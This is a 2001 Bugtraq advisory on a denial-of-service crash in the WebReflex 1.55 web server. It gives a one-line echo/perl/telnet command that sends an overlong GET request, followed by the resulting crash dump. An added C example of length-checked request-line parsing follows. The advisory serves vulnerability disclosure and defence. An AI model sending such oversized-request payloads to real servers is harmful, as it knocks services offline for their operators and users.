[19390] in bugtraq
WebReflex 1.55 HTTPd DoS
daemon@ATHENA.MIT.EDU (slipy@B10Z.NET)
Tue Feb 27 15:41:53 2001
Message-ID: <20010227053443.15865.qmail@securityfocus.com>
Date: Tue, 27 Feb 2001 05:34:43 -0000
Reply-To: slipy@B10Z.NET
From: slipy@B10Z.NET
To: BUGTRAQ@SECURITYFOCUS.COM
Introduction:
WebReflex is an easy-to-use web server that is simple to set up. Its features include a limitless number of concurrent requests, drive and directory lists, built-in server-side image maps, an implementation of the CGI-WIN standard, user-defined directory index files, user-defined error files, built-in MIME type mappings plus user-defined mappings, built-in server-push using sequence files, a log file in the common log file format, and all the rest. The best feature of this server is the ability to run it from a CD-ROM.
The vendor's website is:
http://www.sapio.com/reflex/
Problem: Denial of Service Attack
WebReflex 1.55 is vulnerable to a simple Denial of Service attack that causes a General Protection Fault in the program, which then quits. WebReflex is for the Microsoft (c) operating systems; all appear to be vulnerable.
Examples:
echo "GET " `perl -e 'print "A" x 666'` | telnet 192.168.0.20 80
^^ = Will cause the program to quit within seconds and display:
REFLEX16 caused a general protection fault
in module KRNL386.EXE at 0001:00008aee.
Registers:
EAX=86cf0000 CS=014f EIP=00008aee
EFLGS=00000282 EBX=830f000a SS=86f7
ESP=00008d86 EBP=00008da0 ECX=0000000a
DS=0167 ESI=00009051 FS=0000 EDX=ffff8dae
ES=86ef EDI=00008c82 GS=0000
Bytes at CS:EIP:
07 1f 61 c3 06 2e 8e 06 02 00 26 89 16 f4 12 26
Stack dump:
41414141 41414141 41414141 41414141 41414141
41414141 41414141 41414141 41414141 41414141
41414141 41414141 41414141 41414141 41414141
41414141
Solution:
The vendor has been notified; waiting for a reply.
--------------------
b10z HTTPd Advisory
slipy@b10z.net
Found: February 27th, 2001.
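
Added example (not part of the original advisory and not WebReflex code): the trigger above is a request line far longer than the server copes with, so one server-side check is to bound the method and URI before copying them and to answer 414 instead of faulting. The limits and the names `parse_request_line` and `take_token` are hypothetical.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical limits chosen for this example; not taken from WebReflex. */
#define MAX_METHOD 8
#define MAX_URI    255

struct request_line {
    char method[MAX_METHOD + 1];
    char uri[MAX_URI + 1];
};

/* Copy the token at *pos (ending at space, CR, LF or end of input) into dst,
 * which holds cap bytes plus a terminator. Returns the token length, or -1
 * if the token does not fit; the length is checked before anything is copied. */
static long take_token(const char *buf, size_t len, size_t *pos,
                       char *dst, size_t cap)
{
    size_t start = *pos, n = 0;
    while (start + n < len && buf[start + n] != ' ' &&
           buf[start + n] != '\r' && buf[start + n] != '\n') {
        if (n == cap)
            return -1;              /* too long: reject, copy nothing */
        n++;
    }
    memcpy(dst, buf + start, n);
    dst[n] = '\0';
    *pos = start + n;
    return (long)n;
}

/* Parse "METHOD SP URI ..." from untrusted input with an explicit length.
 * Returns 0 on success, 400 for a malformed line, 414 for an oversized URI. */
int parse_request_line(const char *buf, size_t len, struct request_line *out)
{
    size_t pos = 0;
    if (take_token(buf, len, &pos, out->method, MAX_METHOD) <= 0)
        return 400;
    if (pos >= len || buf[pos] != ' ')
        return 400;
    while (pos < len && buf[pos] == ' ')
        pos++;                      /* tolerate repeated spaces */
    long n = take_token(buf, len, &pos, out->uri, MAX_URI);
    if (n < 0)
        return 414;                 /* Request-URI Too Long */
    return n == 0 ? 400 : 0;
}
```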